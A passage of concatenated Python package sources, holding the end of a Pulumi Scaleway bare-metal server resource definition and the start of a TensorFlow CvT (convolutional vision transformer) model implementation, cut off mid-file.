:param pulumi.Input[str] description: Some description to associate to the server, max 255 characters
:param pulumi.Input[str] hostname: Hostname of the server
:param pulumi.Input[str] name: Name of the server
:param pulumi.Input[str] project_id: The project_id you want to attach the resource to
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: Array of tags to associate with the server
:param pulumi.Input[str] zone: The zone you want to attach the resource to
"""
pulumi.set(__self__, "offer", offer)
pulumi.set(__self__, "os", os)
pulumi.set(__self__, "ssh_key_ids", ssh_key_ids)
if description is not None:
pulumi.set(__self__, "description", description)
if hostname is not None:
pulumi.set(__self__, "hostname", hostname)
if name is not None:
pulumi.set(__self__, "name", name)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if zone is not None:
pulumi.set(__self__, "zone", zone)
@property
@pulumi.getter
def offer(self) -> pulumi.Input[str]:
"""
ID or name of the server offer
"""
return pulumi.get(self, "offer")
@offer.setter
def offer(self, value: pulumi.Input[str]):
pulumi.set(self, "offer", value)
@property
@pulumi.getter
def os(self) -> pulumi.Input[str]:
"""
The base image of the server
"""
return pulumi.get(self, "os")
@os.setter
def os(self, value: pulumi.Input[str]):
pulumi.set(self, "os", value)
@property
@pulumi.getter(name="sshKeyIds")
def ssh_key_ids(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
Array of SSH key IDs allowed to SSH to the server
"""
return pulumi.get(self, "ssh_key_ids")
@ssh_key_ids.setter
def ssh_key_ids(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "ssh_key_ids", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Some description to associate to the server, max 255 characters
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def hostname(self) -> Optional[pulumi.Input[str]]:
"""
Hostname of the server
"""
return pulumi.get(self, "hostname")
@hostname.setter
def hostname(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "hostname", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the server
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
"""
The project_id you want to attach the resource to
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Array of tags to associate with the server
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def zone(self) -> Optional[pulumi.Input[str]]:
"""
The zone you want to attach the resource to
"""
return pulumi.get(self, "zone")
@zone.setter
def zone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zone", value)
@pulumi.input_type
class _BaremetalServerState:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
hostname: Optional[pulumi.Input[str]] = None,
ips: Optional[pulumi.Input[Sequence[pulumi.Input['BaremetalServerIpArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None,
offer: Optional[pulumi.Input[str]] = None,
offer_id: Optional[pulumi.Input[str]] = None,
organization_id: Optional[pulumi.Input[str]] = None,
os: Optional[pulumi.Input[str]] = None,
os_id: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
ssh_key_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
zone: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering BaremetalServer resources.
:param pulumi.Input[str] description: Some description to associate to the server, max 255 characters
:param pulumi.Input[str] hostname: Hostname of the server
:param pulumi.Input[str] name: Name of the server
:param pulumi.Input[str] offer: ID or name of the server offer
:param pulumi.Input[str] offer_id: ID of the server offer
:param pulumi.Input[str] organization_id: The organization_id you want to attach the resource to
:param pulumi.Input[str] os: The base image of the server
:param pulumi.Input[str] os_id: The base image ID of the server
:param pulumi.Input[str] project_id: The project_id you want to attach the resource to
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_key_ids: Array of SSH key IDs allowed to SSH to the server
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: Array of tags to associate with the server
:param pulumi.Input[str] zone: The zone you want to attach the resource to
"""
if description is not None:
pulumi.set(__self__, "description", description)
if domain is not None:
pulumi.set(__self__, "domain", domain)
if hostname is not None:
pulumi.set(__self__, "hostname", hostname)
if ips is not None:
pulumi.set(__self__, "ips", ips)
if name is not None:
pulumi.set(__self__, "name", name)
if offer is not None:
pulumi.set(__self__, "offer", offer)
if offer_id is not None:
pulumi.set(__self__, "offer_id", offer_id)
if organization_id is not None:
pulumi.set(__self__, "organization_id", organization_id)
if os is not None:
pulumi.set(__self__, "os", os)
if os_id is not None:
pulumi.set(__self__, "os_id", os_id)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
if ssh_key_ids is not None:
pulumi.set(__self__, "ssh_key_ids", ssh_key_ids)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if zone is not None:
pulumi.set(__self__, "zone", zone)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Some description to associate to the server, max 255 characters
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def domain(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain", value)
@property
@pulumi.getter
def hostname(self) -> Optional[pulumi.Input[str]]:
"""
Hostname of the server
"""
return pulumi.get(self, "hostname")
@hostname.setter
def hostname(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "hostname", value)
@property
@pulumi.getter
def ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['BaremetalServerIpArgs']]]]:
return pulumi.get(self, "ips")
@ips.setter
def ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['BaremetalServerIpArgs']]]]):
pulumi.set(self, "ips", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the server
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def offer(self) -> Optional[pulumi.Input[str]]:
"""
ID or name of the server offer
"""
return pulumi.get(self, "offer")
@offer.setter
def offer(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "offer", value)
@property
@pulumi.getter(name="offerId")
def offer_id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the server offer
"""
return pulumi.get(self, "offer_id")
@offer_id.setter
def offer_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "offer_id", value)
@property
@pulumi.getter(name="organizationId")
def organization_id(self) -> Optional[pulumi.Input[str]]:
"""
The organization_id you want to attach the resource to
"""
return pulumi.get(self, "organization_id")
@organization_id.setter
def organization_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "organization_id", value)
@property
@pulumi.getter
def os(self) -> Optional[pulumi.Input[str]]:
"""
The base image of the server
"""
return pulumi.get(self, "os")
@os.setter
def os(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "os", value)
@property
@pulumi.getter(name="osId")
def os_id(self) -> Optional[pulumi.Input[str]]:
"""
The base image ID of the server
"""
return pulumi.get(self, "os_id")
@os_id.setter
def os_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "os_id", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
"""
The project_id you want to attach the resource to
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter(name="sshKeyIds")
def ssh_key_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Array of SSH key IDs allowed to SSH to the server
"""
return pulumi.get(self, "ssh_key_ids")
@ssh_key_ids.setter
def ssh_key_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_key_ids", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Array of tags to associate with the server
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def zone(self) -> Optional[pulumi.Input[str]]:
"""
The zone you want to attach the resource to
"""
return pulumi.get(self, "zone")
@zone.setter
def zone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zone", value)
class BaremetalServer(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
hostname: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
offer: Optional[pulumi.Input[str]] = None,
os: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
ssh_key_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
zone: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Create a BaremetalServer resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: Some description to associate to the server, max 255 characters
:param pulumi.Input[str] hostname: Hostname of the server
:param pulumi.Input[str] name: Name of the server
:param pulumi.Input[str] offer: ID or name of the server offer
:param pulumi.Input[str] os: The base image of the server
:param pulumi.Input[str] project_id: The project_id you want to attach the resource to
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_key_ids: Array of SSH key IDs allowed to SSH to the server
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: Array of tags to associate with the server
:param pulumi.Input[str] zone: The zone you want to attach the resource to
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: BaremetalServerArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a BaremetalServer resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param BaremetalServerArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(BaremetalServerArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
hostname: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
offer: Optional[pulumi.Input[str]] = None,
os: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
ssh_key_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
zone: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.plugin_download_url is None:
opts.plugin_download_url = _utilities.get_plugin_download_url()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = BaremetalServerArgs.__new__(BaremetalServerArgs)
__props__.__dict__["description"] = description
__props__.__dict__["hostname"] = hostname
__props__.__dict__["name"] = name
if offer is None and not opts.urn:
raise TypeError("Missing required property 'offer'")
__props__.__dict__["offer"] = offer
if os is None and not opts.urn:
raise TypeError("Missing required property 'os'")
__props__.__dict__["os"] = os
__props__.__dict__["project_id"] = project_id
if ssh_key_ids is None and not opts.urn:
raise TypeError("Missing required property 'ssh_key_ids'")
__props__.__dict__["ssh_key_ids"] = ssh_key_ids
__props__.__dict__["tags"] = tags
__props__.__dict__["zone"] = zone
__props__.__dict__["domain"] = None
__props__.__dict__["ips"] = None
__props__.__dict__["offer_id"] = None
__props__.__dict__["organization_id"] = None
__props__.__dict__["os_id"] = None
super(BaremetalServer, __self__).__init__(
'scaleway:index/baremetalServer:BaremetalServer',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
hostname: Optional[pulumi.Input[str]] = None,
ips: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BaremetalServerIpArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
offer: Optional[pulumi.Input[str]] = None,
offer_id: Optional[pulumi.Input[str]] = None,
organization_id: Optional[pulumi.Input[str]] = None,
os: Optional[pulumi.Input[str]] = None,
os_id: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
ssh_key_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
zone: Optional[pulumi.Input[str]] = None) -> 'BaremetalServer':
"""
Get an existing BaremetalServer resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: Some description to associate to the server, max 255 characters
:param pulumi.Input[str] hostname: Hostname of the server
:param pulumi.Input[str] name: Name of the server
:param pulumi.Input[str] offer: ID or name of the server offer
:param pulumi.Input[str] offer_id: ID of the server offer
:param pulumi.Input[str] organization_id: The organization_id you want to attach the resource to
:param pulumi.Input[str] os: The base image of the server
:param pulumi.Input[str] os_id: The base image ID of the server
:param pulumi.Input[str] project_id: The project_id you want to attach the resource to
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_key_ids: Array of SSH key IDs allowed to SSH to the server
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: Array of tags to associate with the server
:param pulumi.Input[str] zone: The zone you want to attach the resource to
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _BaremetalServerState.__new__(_BaremetalServerState)
__props__.__dict__["description"] = description
__props__.__dict__["domain"] = domain
__props__.__dict__["hostname"] = hostname
__props__.__dict__["ips"] = ips
__props__.__dict__["name"] = name
__props__.__dict__["offer"] = offer
__props__.__dict__["offer_id"] = offer_id
__props__.__dict__["organization_id"] = organization_id
__props__.__dict__["os"] = os
__props__.__dict__["os_id"] = os_id
__props__.__dict__["project_id"] = project_id
__props__.__dict__["ssh_key_ids"] = ssh_key_ids
__props__.__dict__["tags"] = tags
__props__.__dict__["zone"] = zone
return BaremetalServer(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
Some description to associate to the server, max 255 characters
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def domain(self) -> pulumi.Output[str]:
return pulumi.get(self, "domain")
@property
@pulumi.getter
def hostname(self) -> pulumi.Output[Optional[str]]:
"""
Hostname of the server
"""
return pulumi.get(self, "hostname")
@property
@pulumi.getter
def ips(self) -> pulumi.Output[Sequence['outputs.BaremetalServerIp']]:
return pulumi.get(self, "ips")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the server
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def offer(self) -> pulumi.Output[str]:
"""
ID or name of the server offer
"""
return pulumi.get(self, "offer")
@property
@pulumi.getter(name="offerId")
def offer_id(self) -> pulumi.Output[str]:
"""
ID of the server offer
"""
return pulumi.get(self, "offer_id")
@property
@pulumi.getter(name="organizationId")
def organization_id(self) -> pulumi.Output[str]:
"""
The organization_id you want to attach the resource to
"""
return pulumi.get(self, "organization_id")
@property
@pulumi.getter
def os(self) -> pulumi.Output[str]:
"""
The base image of the server
"""
return pulumi.get(self, "os")
@property
@pulumi.getter(name="osId")
def os_id(self) -> pulumi.Output[str]:
"""
The base image ID of the server
"""
return pulumi.get(self, "os_id")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Output[str]:
"""
The project_id you want to attach the resource to
"""
return pulumi.get(self, "project_id")
@property
@pulumi.getter(name="sshKeyIds")
def ssh_key_ids(self) -> pulumi.Output[Sequence[str]]:
"""
Array of SSH key IDs allowed to SSH to the server
"""
return pulumi.get(self, "ssh_key_ids")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Array of tags to associate with the server
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def zone(self) -> pulumi.Output[str]:
"""
The zone you want to attach the resource to
"""
return pulumi.get(self, "zone") | PypiClean |
/xs_transformers-1.0.7-py3-none-any.whl/xs_transformers/models/cvt/modeling_tf_cvt.py | import collections.abc
from dataclasses import dataclass
from typing import Dict, Optional, Tuple, Union
import tensorflow as tf
from ...modeling_tf_outputs import TFImageClassifierOutputWithNoAttention
from ...modeling_tf_utils import (
TFModelInputType,
TFPreTrainedModel,
TFSequenceClassificationLoss,
get_initializer,
keras_serializable,
unpack_inputs,
)
from ...tf_utils import shape_list, stable_softmax
from ...utils import (
ModelOutput,
add_start_docstrings,
add_start_docstrings_to_model_forward,
logging,
replace_return_docstrings,
)
from .configuration_cvt import CvtConfig
logger = logging.get_logger(__name__)
# General docstring
_CONFIG_FOR_DOC = "CvtConfig"
TF_CVT_PRETRAINED_MODEL_ARCHIVE_LIST = [
"microsoft/cvt-13",
"microsoft/cvt-13-384",
"microsoft/cvt-13-384-22k",
"microsoft/cvt-21",
"microsoft/cvt-21-384",
"microsoft/cvt-21-384-22k",
# See all Cvt models at https://huggingface.co/models?filter=cvt
]
@dataclass
class TFBaseModelOutputWithCLSToken(ModelOutput):
"""
Base class for model's outputs.
Args:
last_hidden_state (`tf.Tensor` of shape `(batch_size, sequence_length, hidden_size)`):
Sequence of hidden-states at the output of the last layer of the model.
cls_token_value (`tf.Tensor` of shape `(batch_size, 1, hidden_size)`):
Classification token at the output of the last layer of the model.
hidden_states (`tuple(tf.Tensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `tf.Tensor` (one for the output of the embeddings + one for the output of each layer) of shape
`(batch_size, sequence_length, hidden_size)`. Hidden-states of the model at the output of each layer plus
the initial embedding outputs.
"""
last_hidden_state: tf.Tensor = None
cls_token_value: tf.Tensor = None
hidden_states: Optional[Tuple[tf.Tensor]] = None
class TFCvtDropPath(tf.keras.layers.Layer):
"""Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).
References:
(1) github.com:rwightman/pytorch-image-models
"""
def __init__(self, drop_prob: float, **kwargs):
super().__init__(**kwargs)
self.drop_prob = drop_prob
def call(self, x: tf.Tensor, training=None):
if self.drop_prob == 0.0 or not training:
return x
keep_prob = 1 - self.drop_prob
shape = (tf.shape(x)[0],) + (1,) * (len(tf.shape(x)) - 1)
random_tensor = keep_prob + tf.random.uniform(shape, 0, 1)
random_tensor = tf.floor(random_tensor)
return (x / keep_prob) * random_tensor
class TFCvtEmbeddings(tf.keras.layers.Layer):
"""Construct the Convolutional Token Embeddings."""
def __init__(
self,
config: CvtConfig,
patch_size: int,
embed_dim: int,
stride: int,
padding: int,
dropout_rate: float,
**kwargs,
):
super().__init__(**kwargs)
self.convolution_embeddings = TFCvtConvEmbeddings(
config,
patch_size=patch_size,
embed_dim=embed_dim,
stride=stride,
padding=padding,
name="convolution_embeddings",
)
self.dropout = tf.keras.layers.Dropout(dropout_rate)
def call(self, pixel_values: tf.Tensor, training: bool = False) -> tf.Tensor:
hidden_state = self.convolution_embeddings(pixel_values)
hidden_state = self.dropout(hidden_state, training=training)
return hidden_state
class TFCvtConvEmbeddings(tf.keras.layers.Layer):
"""Image to Convolution Embeddings. This convolutional operation aims to model local spatial contexts."""
def __init__(
self,
config: CvtConfig,
patch_size: int,
embed_dim: int,
stride: int,
padding: int,
**kwargs,
):
super().__init__(**kwargs)
self.padding = tf.keras.layers.ZeroPadding2D(padding=padding)
self.patch_size = (
patch_size
if isinstance(patch_size, collections.abc.Iterable)
else (patch_size, patch_size)
)
self.projection = tf.keras.layers.Conv2D(
filters=embed_dim,
kernel_size=patch_size,
strides=stride,
padding="valid",
data_format="channels_last",
kernel_initializer=get_initializer(config.initializer_range),
name="projection",
)
# Using the same default epsilon as PyTorch
self.normalization = tf.keras.layers.LayerNormalization(
epsilon=1e-5, name="normalization"
)
def call(self, pixel_values: tf.Tensor) -> tf.Tensor:
if isinstance(pixel_values, dict):
pixel_values = pixel_values["pixel_values"]
pixel_values = self.projection(self.padding(pixel_values))
# "batch_size, height, width, num_channels -> batch_size, (height*width), num_channels"
batch_size, height, width, num_channels = shape_list(pixel_values)
hidden_size = height * width
pixel_values = tf.reshape(
pixel_values, shape=(batch_size, hidden_size, num_channels)
)
pixel_values = self.normalization(pixel_values)
# "batch_size, (height*width), num_channels -> batch_size, height, width, num_channels"
pixel_values = tf.reshape(
pixel_values, shape=(batch_size, height, width, num_channels)
)
return pixel_values
class TFCvtSelfAttentionConvProjection(tf.keras.layers.Layer):
"""Convolutional projection layer."""
def __init__(
self,
config: CvtConfig,
embed_dim: int,
kernel_size: int,
stride: int,
padding: int,
**kwargs,
):
super().__init__(**kwargs)
self.padding = tf.keras.layers.ZeroPadding2D(padding=padding)
self.convolution = tf.keras.layers.Conv2D(
filters=embed_dim,
kernel_size=kernel_size,
kernel_initializer=get_initializer(config.initializer_range),
padding="valid",
strides=stride,
use_bias=False,
name="convolution",
groups=embed_dim,
)
# Using the same default epsilon as PyTorch, TF uses (1 - pytorch momentum)
self.normalization = tf.keras.layers.BatchNormalization(
epsilon=1e-5, momentum=0.9, name="normalization"
)
def call(self, hidden_state: tf.Tensor, training: bool = False) -> tf.Tensor:
hidden_state = self.convolution(self.padding(hidden_state))
hidden_state = self.normalization(hidden_state, training=training)
return hidden_state
class TFCvtSelfAttentionLinearProjection(tf.keras.layers.Layer):
"""Linear projection layer used to flatten tokens into 1D."""
def call(self, hidden_state: tf.Tensor) -> tf.Tensor:
# "batch_size, height, width, num_channels -> batch_size, (height*width), num_channels"
batch_size, height, width, num_channels = shape_list(hidden_state)
hidden_size = height * width
hidden_state = tf.reshape(
hidden_state, shape=(batch_size, hidden_size, num_channels)
)
return hidden_state
class TFCvtSelfAttentionProjection(tf.keras.layers.Layer):
"""Convolutional Projection for Attention."""
def __init__(
self,
config: CvtConfig,
embed_dim: int,
kernel_size: int,
stride: int,
padding: int,
projection_method: str = "dw_bn",
**kwargs,
):
super().__init__(**kwargs)
if projection_method == "dw_bn":
self.convolution_projection = TFCvtSelfAttentionConvProjection(
config,
embed_dim,
kernel_size,
stride,
padding,
name="convolution_projection",
)
self.linear_projection = TFCvtSelfAttentionLinearProjection()
def call(self, hidden_state: tf.Tensor, training: bool = False) -> tf.Tensor:
hidden_state = self.convolution_projection(hidden_state, training=training)
hidden_state = self.linear_projection(hidden_state)
return hidden_state
class TFCvtSelfAttention(tf.keras.layers.Layer):
"""
Self-attention layer. A depth-wise separable convolution operation (Convolutional Projection), is applied for
query, key, and value embeddings.
"""
def __init__(
self,
config: CvtConfig,
num_heads: int,
embed_dim: int,
kernel_size: int,
stride_q: int,
stride_kv: int,
padding_q: int,
padding_kv: int,
qkv_projection_method: str,
qkv_bias: bool,
attention_drop_rate: float,
with_cls_token: bool = True,
**kwargs,
):
super().__init__(**kwargs)
self.scale = embed_dim**-0.5
self.with_cls_token = with_cls_token
self.embed_dim = embed_dim
self.num_heads = num_heads
self.convolution_projection_query = TFCvtSelfAttentionProjection(
config,
embed_dim,
kernel_size,
stride_q,
padding_q,
projection_method="linear"
if qkv_projection_method == "avg"
else qkv_projection_method,
name="convolution_projection_query",
)
self.convolution_projection_key = TFCvtSelfAttentionProjection(
config,
embed_dim,
kernel_size,
stride_kv,
padding_kv,
projection_method=qkv_projection_method,
name="convolution_projection_key",
)
self.convolution_projection_value = TFCvtSelfAttentionProjection(
config,
embed_dim,
kernel_size,
stride_kv,
padding_kv,
projection_method=qkv_projection_method,
name="convolution_projection_value",
)
self.projection_query = tf.keras.layers.Dense(
units=embed_dim,
kernel_initializer=get_initializer(config.initializer_range),
use_bias=qkv_bias,
bias_initializer="zeros",
name="projection_query",
)
self.projection_key = tf.keras.layers.Dense(
units=embed_dim,
kernel_initializer=get_initializer(config.initializer_range),
use_bias=qkv_bias,
bias_initializer="zeros",
name="projection_key",
)
self.projection_value = tf.keras.layers.Dense(
units=embed_dim,
kernel_initializer=get_initializer(config.initializer_range),
use_bias=qkv_bias,
bias_initializer="zeros",
name="projection_value",
)
self.dropout = tf.keras.layers.Dropout(attention_drop_rate)
def rearrange_for_multi_head_attention(self, hidden_state: tf.Tensor) -> tf.Tensor:
batch_size, hidden_size, _ = shape_list(hidden_state)
head_dim = self.embed_dim // self.num_heads
hidden_state = tf.reshape(
hidden_state, shape=(batch_size, hidden_size, self.num_heads, head_dim)
)
hidden_state = tf.transpose(hidden_state, perm=(0, 2, 1, 3))
return hidden_state
def call(
self, hidden_state: tf.Tensor, height: int, width: int, training: bool = False
) -> tf.Tensor:
if self.with_cls_token:
cls_token, hidden_state = tf.split(hidden_state, [1, height * width], 1)
# "batch_size, (height*width), num_channels -> batch_size, height, width, num_channels"
batch_size, hidden_size, num_channels = shape_list(hidden_state)
hidden_state = tf.reshape(
hidden_state, shape=(batch_size, height, width, num_channels)
)
key = self.convolution_projection_key(hidden_state, training=training)
query = self.convolution_projection_query(hidden_state, training=training)
value = self.convolution_projection_value(hidden_state, training=training)
if self.with_cls_token:
query = tf.concat((cls_token, query), axis=1)
key = tf.concat((cls_token, key), axis=1)
value = tf.concat((cls_token, value), axis=1)
head_dim = self.embed_dim // self.num_heads
query = self.rearrange_for_multi_head_attention(self.projection_query(query))
key = self.rearrange_for_multi_head_attention(self.projection_key(key))
value = self.rearrange_for_multi_head_attention(self.projection_value(value))
attention_score = tf.matmul(query, key, transpose_b=True) * self.scale
attention_probs = stable_softmax(logits=attention_score, axis=-1)
attention_probs = self.dropout(attention_probs, training=training)
context = tf.matmul(attention_probs, value)
# "batch_size, num_heads, hidden_size, head_dim -> batch_size, hidden_size, (num_heads*head_dim)"
_, _, hidden_size, _ = shape_list(context)
context = tf.transpose(context, perm=(0, 2, 1, 3))
context = tf.reshape(
context, (batch_size, hidden_size, self.num_heads * head_dim)
)
return context
class TFCvtSelfOutput(tf.keras.layers.Layer):
"""Output of the Attention layer ."""
def __init__(self, config: CvtConfig, embed_dim: int, drop_rate: float, **kwargs):
super().__init__(**kwargs)
self.dense = tf.keras.layers.Dense(
units=embed_dim,
kernel_initializer=get_initializer(config.initializer_range),
name="dense",
)
self.dropout = tf.keras.layers.Dropout(drop_rate)
def call(self, hidden_state: tf.Tensor, training: bool = False) -> tf.Tensor:
hidden_state = self.dense(inputs=hidden_state)
hidden_state = self.dropout(inputs=hidden_state, training=training)
return hidden_state
class TFCvtAttention(tf.keras.layers.Layer):
"""Attention layer. First chunk of the convolutional transformer block."""
def __init__(
self,
config: CvtConfig,
num_heads: int,
embed_dim: int,
kernel_size: int,
stride_q: int,
stride_kv: int,
padding_q: int,
padding_kv: int,
qkv_projection_method: str,
qkv_bias: bool,
attention_drop_rate: float,
drop_rate: float,
with_cls_token: bool = True,
**kwargs,
):
super().__init__(**kwargs)
self.attention = TFCvtSelfAttention(
config,
num_heads,
embed_dim,
kernel_size,
stride_q,
stride_kv,
padding_q,
padding_kv,
qkv_projection_method,
qkv_bias,
attention_drop_rate,
with_cls_token,
name="attention",
)
self.dense_output = TFCvtSelfOutput(config, embed_dim, drop_rate, name="output")
def prune_heads(self, heads):
raise NotImplementedError
def call(
self, hidden_state: tf.Tensor, height: int, width: int, training: bool = False
):
self_output = self.attention(hidden_state, height, width, training=training)
attention_output = self.dense_output(self_output, training=training)
return attention_output
class TFCvtIntermediate(tf.keras.layers.Layer):
"""Intermediate dense layer. Second chunk of the convolutional transformer block."""
def __init__(self, config: CvtConfig, embed_dim: int, mlp_ratio: int, **kwargs):
super().__init__(**kwargs)
self.dense = tf.keras.layers.Dense(
units=int(embed_dim * mlp_ratio),
kernel_initializer=get_initializer(config.initializer_range),
activation="gelu",
name="dense",
)
def call(self, hidden_state: tf.Tensor) -> tf.Tensor:
hidden_state = self.dense(hidden_state)
return hidden_state
class TFCvtOutput(tf.keras.layers.Layer):
"""
Output of the Convolutional Transformer Block (last chunk). It consists of a MLP and a residual connection.
"""
def __init__(self, config: CvtConfig, embed_dim: int, drop_rate: int, **kwargs):
super().__init__(**kwargs)
self.dense = tf.keras.layers.Dense(
units=embed_dim,
kernel_initializer=get_initializer(config.initializer_range),
name="dense",
)
self.dropout = tf.keras.layers.Dropout(drop_rate)
def call(
self, hidden_state: tf.Tensor, input_tensor: tf.Tensor, training: bool = False
) -> tf.Tensor:
hidden_state = self.dense(inputs=hidden_state)
hidden_state = self.dropout(inputs=hidden_state, training=training)
hidden_state = hidden_state + input_tensor
return hidden_state
class TFCvtLayer(tf.keras.layers.Layer):
"""
